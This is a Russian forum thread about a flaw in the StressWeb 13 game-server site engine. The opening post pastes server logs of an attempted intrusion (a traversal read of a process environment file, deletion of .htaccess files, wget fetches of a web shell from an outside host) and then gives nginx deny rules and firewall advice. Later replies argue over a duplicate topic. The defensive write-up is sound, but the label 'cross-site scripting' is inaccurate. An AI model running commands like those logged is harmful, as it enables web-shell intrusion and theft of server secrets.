Уязвимости Stressweb 13

[Mefestofel163 1333]

Тема для ознакомления, наткнулся случайно в рунете

 

Сылка на оф тему если кому то не удобно читать http://zone-mmo.ru/news/93-hack-uyazvimosti-stressweb.html

 

 

 

Делать было нечего и решил я ненароком заглянуть в логи сервера, открыл самые старые и начал быстро пролистывать. Какого же было мое удивление когда я наткнулся на такие строки в отработчике fcgi

 

Sep 15 22:15:46.551306 [WARNING] fpm_stdio_child_said(), line 167: child 18889 (pool default) said into stderr: "[sat Sep 15 22:15:46 2012] [warn-phpd] mmap cache can't open /home/site/www/public_WWW/application/../../../../../proc/31949/environ - Permission denied (pid 18889)"

Sep 15 22:58:50.521598 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found"

Sep 15 22:58:50.527109 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found"

Sep 15 22:58:50.533681 [WARNING] fpm_stdio_child_said(), line 167: child 18881 (pool default) said into stderr: "sh: 0: command not found"

Sep 15 23:03:53.294177 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/cache/.htaccess': No such file or directory"

Sep 15 23:03:53.299984 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "rm: "

Sep 15 23:03:53.300113 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: "cannot remove `/home/site/www/public_WWW/cache/.htaccess'"

Sep 15 23:03:53.300183 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: ": No such file or directory"

Sep 15 23:03:53.300221 [WARNING] fpm_stdio_child_said(), line 167: child 18883 (pool default) said into stderr: ""

Sep 15 23:05:35.377689 [WARNING] fpm_stdio_child_said(), line 167: child 18888 (pool default) said into stderr: "rm: cannot remove `/home/site/www/forum.public_WWW/customavatars/index.html': Permission denied"

Sep 15 23:06:44.788091 [WARNING] fpm_stdio_child_said(), line 167: child 18864 (pool default) said into stderr: "cat: /home/site/www/public_WWW/cache/.htaccess: No such file or directory"

Sep 15 23:08:31.071273 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php"

Sep 15 23:08:31.071371 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... "

Sep 15 23:08:31.190293 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38"

Sep 15 23:08:31.190390 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... "

Sep 15 23:08:31.206526 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected."

Sep 15 23:08:31.206628 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... "

Sep 15 23:08:31.230703 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK"

Sep 15 23:08:31.230881 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: 24885"

Sep 15 23:08:31.230926 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K) [application/octet-stream]"

Sep 15 23:08:31.231015 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied"

Sep 15 23:08:31.231073 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: ""

Sep 15 23:08:31.231100 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)."

Sep 15 23:08:31.237323 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php"

Sep 15 23:08:31.237398 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... "

Sep 15 23:08:31.239476 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38"

Sep 15 23:08:31.239574 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... "

Sep 15 23:08:31.260610 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected."

Sep 15 23:08:31.260697 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... "

Sep 15 23:08:31.278255 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK"

Sep 15 23:08:31.278374 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: "

Sep 15 23:08:31.278428 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "24885"

Sep 15 23:08:31.278469 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K)"

Sep 15 23:08:31.278507 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " [application/octet-stream]"

Sep 15 23:08:31.278553 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied"

Sep 15 23:08:31.278601 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: ""

Sep 15 23:08:31.278627 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)."

Sep 15 23:08:31.285959 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "--2012-09-15 23:08:31-- http://bigtraf777.na...uper.jpg/w.php"

Sep 15 23:08:31.286045 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Resolving bigtraf777.narod.ru... "

Sep 15 23:08:31.288344 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "213.180.199.38"

Sep 15 23:08:31.288425 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Connecting to bigtraf777.narod.ru|213.180.199.38|:80... "

Sep 15 23:08:31.365533 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "connected."

Sep 15 23:08:31.365608 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "HTTP request sent, awaiting response... "

Sep 15 23:08:31.388258 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "200 OK"

Sep 15 23:08:31.388370 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Length: "

Sep 15 23:08:31.388411 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "24885"

Sep 15 23:08:31.388454 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: " (24K) [application/octet-stream]"

Sep 15 23:08:31.388560 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "w.php: Permission denied"

Sep 15 23:08:31.388611 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: ""

Sep 15 23:08:31.388639 [WARNING] fpm_stdio_child_said(), line 167: child 18886 (pool default) said into stderr: "Cannot write to `w.php' (Permission denied)."

Sep 15 23:11:49.034817 [WARNING] fpm_stdio_child_said(), line 167: child 18890 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/images/.htaccess': No such file or directory"

Sep 15 23:11:49.040454 [WARNING] fpm_stdio_child_said(), line 167: child 18890 (pool default) said into stderr: "rm: cannot remove `/home/site/www/public_WWW/images/.htaccess': No such file or directory"

Sep 15 23:12:34.902937 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/"

Sep 15 23:12:34.903027 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory"

Sep 15 23:12:34.910153 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/"

Sep 15 23:12:34.910279 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory"

Sep 15 23:12:34.917624 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: "ls: modules/"

Sep 15 23:12:34.917700 [WARNING] fpm_stdio_child_said(), line 167: child 18877 (pool default) said into stderr: ": No such file or directory"

 

Сопоставив все это с аксесс логом подведем следующие итоги дамы и господа

 

StressWeb имеет уязвимость, а именно межсайтовый скриптинг. Залить шелл мне на хост в итоге не получилось по причине тонких настроек безопасности и нюансов в настройках NGINX

 

Несколько полезных советов как обезопасить себя. Актуально если используется NGINX, апач я не рассматриваю

 

Все папки в директории куда залит стрессвэб полжны иметь права 755 исключающие запись за исключением папки cache, для нее необходимы права 777

 

В конфиг хоста для ngix до передачи типа рнр на отработку добавляем:

 

В конфиг хоста для ngix до передачи типа рнр на отработку добавляем:

 

location ~* (config|admin|cache|account|application|dev)/.+\.php {

deny all;

}

 

Правило запрещает обращаться к рнр файлам там где это не нужно а так же запрещает обращение к рнр файлам в директории cache если туда каким то волшебным образом прилетит рнр файлик.

 

location ~* /templates/.+\.tpl {

deny all;

}

 

Правило запрещает сливать ваши tpl файлы дизайна сайта. Правило запрещает сливать ваши tpl файлы дизайна сайта. А именно чтобы не получилось вот так - http:// l2creed. ru/templates/creed123/index.tpl а затем вот так - http:// forummaxi. ru/index.php?showtopic=20316

 

Далее как и в моем случае пароли на мускул с конфигов скорее всего могут быть слиты, для того, что бы они оказались бесполезны на геймсервере и вэюсервере порт на фаерволе 3306 должен быть открыт только для разрешенных айпи. Подробности настройки таблеса под гейм тут - http://forummaxi.ru/...ials&article=45

 

Касаемо подробностей стресса а дыра 100% там буду разбираться с утра на свежую голову. Могу лишь сказать одно, сервер не поимели благодаря этим настройкам.

 

ps

 

межсайтовый скриптинг это инклады и исполнение кода на вашей машине со сторонних адресов.

Изменено 5 декабря, 2012 пользователем Mefestofel163

[logan22 169]

Вот ссылка на оригинальную тему..

 

В вашем случае получилось что один новый нубо портал стащил информацию с л2макси.

А вы свиснули уже украденное и ещё добавили ссылку откуда свиснули. А они не добавили.

Изменено 5 декабря, 2012 пользователем logan22

[MustanG™ 40]

ALAN уже выкладывал данную уязвимость сюда на форум.

[Mefestofel163 1333]

юзал поиск не нашел не чего

[MustanG™ 40]

юзал поиск не нашел не чего

http://forummaxi.ru/index.php?showtopic=20824&hl=

Плохо искал

[logan22 169]

юзал поиск не нашел не чего

 

как же раздражает лож...

Вы даже и не пробовали искать!

[Mefestofel163 1333]

во 1 прежде чем тыкать куда то убедитесь что здоровья много! во 2 я на самом деле не нашел данную тему по запросу (из названия своей темы).

 

 

модеры прошу удалить тему рне актуально.сори за дабл пост

[logan22 169]

во 1 прежде чем тыкать куда то убедитесь что здоровья много!

Убеждался много раз - много!

 

во 2 я на самом деле не нашел данную тему по запросу (из названия своей темы).

Опять лож, почему я нашел по запросу из названия Вашей темы?